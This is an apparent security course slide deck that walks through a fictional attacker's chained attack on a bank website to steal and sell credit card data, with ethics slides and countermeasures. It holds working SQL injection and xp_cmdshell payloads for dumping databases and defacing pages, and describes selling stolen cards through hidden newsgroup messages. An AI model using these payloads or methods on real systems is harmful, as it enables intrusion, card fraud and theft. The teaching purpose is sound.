210 likes | 306 Views
TEL 283. Getting out of Credit Card Debt. Resources Utilized. Chained Exploits Whitaker, Evans, Voth ; Addison-Wesley, 2009. Ethics. Methods discussed in course are considered illegal
E N D
TEL 283 Getting out of Credit Card Debt
Resources Utilized • Chained Exploits • Whitaker, Evans, Voth; Addison-Wesley, 2009
Ethics • Methods discussed in course are considered illegal • Under no circumstances should tools or methods be utilized on any networked system without the explicit written permission of an authorized grantor within that organization • Document should be witnessed and should delineate the boundaries of your actions • Signed document for this course indicating that you understand and appreciate the nature of the concepts and methodologies
Ethics • What is the purpose of instructing these methods and tools? • So that you, as a professional, will understand the methods and tools and be able to determine • When and how they were leveraged against you • Find traces of them during an investigation • Pro-actively search and deter an attack
What is a “Chained Exploit”? • Attack consisting of several exploits or attacks in order to achieve a goal
Credit Card debt • “Phoenix” (obviously not his real name) is in debt for thousands of dollars to a bank’s credit card system, and his rate has just gone up to 29% • Plans to pay off his debt by hitting the bank’s system (PDXO Financial) • If he uses another person’s card to pay off his, it’ll be noticed • Plans to steal cc information and sell it on the black market
Steps • Enumerate the website • Enumerate the cc database • Get cc info from the website • Sell the cc info on the underground market • Trash to website (misdirection)
Enumerate the website • Uncover as much information about the website as possible • Operating system • Web server version running • RFC 2616 specifies the format of the HTTP responses • Some headers returned might contain valuable information regarding the server or site
Enumerate the website • Telnet to the website on port 80 (or whatever port the site is on) telnet www.PDXOfinancial.com 80 • Once connected • Issue the command to receive the site’s HTTP header HEAD / http /1.1 [cr] [cr] • Server type might be revealed • Example show www.marist.edu “HEAD” request
GoolagScan • Tool developed by the Cult of the Dead Cow • www.cultdeadcow.com • Uses Google hacking techniques discovered by Johnny Long (johnny.ihackstuff.com) • Checks strings against website to find files containing passwords, vulnerable files, or directories of interest
Background information • PDXO merged • Might have development websites running due to changes • development.PDXOfinancial.com • beta.PDXOfinancial.com • test.PDXOfinancial.com • dev.PDXOfinancial.com • Checking possible sites might result in bringing up an unprotected web page • In this case, the login form
Enumerate the CC Database • Is the DB server on the same host as the website? • Is MS SQL server used for DB? • Default username of “SA” w/o password? • Is the website installed in the default IIS location? • inetpub\wwwroot • This directory allows for write access • This presumes several weaknesses • Possible due to page coming from a development site • Moral: build security in, even during the development phase of the SDLC
SQL Injection • The ability of a user to craft an SQL or database command from the client side
Uncover the names of the databases • The default database is called “MASTER” • Get the names of the databases in the MASTER file select * from master..sysdatabases • The database expects a username prior to this command, so we need to fool the database into thinking we’ve already done this • Supply a command terminator character “;” before the select command ; select * from master..sysdatabases • Prevent another command from being entered after this by adding a “comment” indicator after the command “--” ; select * from master..sysdatabases --
OSQL • The difficulty with the sql command is that the output would not return • Use “osql”, which is a command line utility • Send the output to a text file • Parameters for osql • -U username • -P password (blank if none supplied) • -Q enter SQL command and exit • -o output file specified osql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\output.txt
OSQL • osql is a command line utility and needs to be entered at the command prompt • Hacker is not at a command prompt • Can use an SQL stored procedure which will execute a command • exec xp_cmdshell ‘<command goes here>’ • So… exec xp_cmdshell ‘osql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\output.txt’ --
SQL Injection • Phoenix uses the form to submit his SL command to the webserver • Webserver passes along the command to the database server for execution w/o verification • Text file is written to the webserver’s document directory • Phoenix changes the URL to that of the output file on the server in order to browse the contents • Examine the contents and see if there are any databases of interest creditcards C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF
SQL Injection • Now that you have the name of the database • Get the table names by changing the SQL command select * from creditcards..sysobjects • One of the tables is called “cardnumbers” select * from creditcards..cardnumbers • The dumped information will be in the output file on the IIS server • Contains names, expiration dates, CVV’s, CC numbers, and PINs
Selling CC Information • Phoenix uses NNTP client (NewsRover) to check alt.2600 newsgroup • Post a message regarding sale of cc info • Set up a bogus email address • getyourcardshere@gmail.com • Use “spammimmic” to disguise a spammed message • Looks like a spam message, but those in the know will recover the hidden message using spammimmic • Can be passwroded with a password or as phony PGP message, or false Cyrillic text • This message is posted to alt.2600 using the phony email address • Respondent agrees to pay $12,000 into a Swiss account • Phoenix’s CC number is one of the many cards sold • Phoenix cancels his card
Defacing the Website • IIS 5.0 Server • MS SQL Server • Default username of SA w/o password • Hosted on the same host as the website • xp_cmdshell stored procedure will be used to overwrite the landing page on the website ;exec xp_cmdshell ‘echo You’ve been hacked! > c:\inetput\wwwroot\default.asp’ --
Countermeasures • Change the default HTTP Response header • Do not allow public access to the development sites • Do not keep the SQL server on the same host as the IIS server • “Sanitize” / validate user form input • Don’t put IIS in the default location • Make the site read-only • Don’t keep unnecessary stored procedures • Don’t use defaults (username / passwords) for the database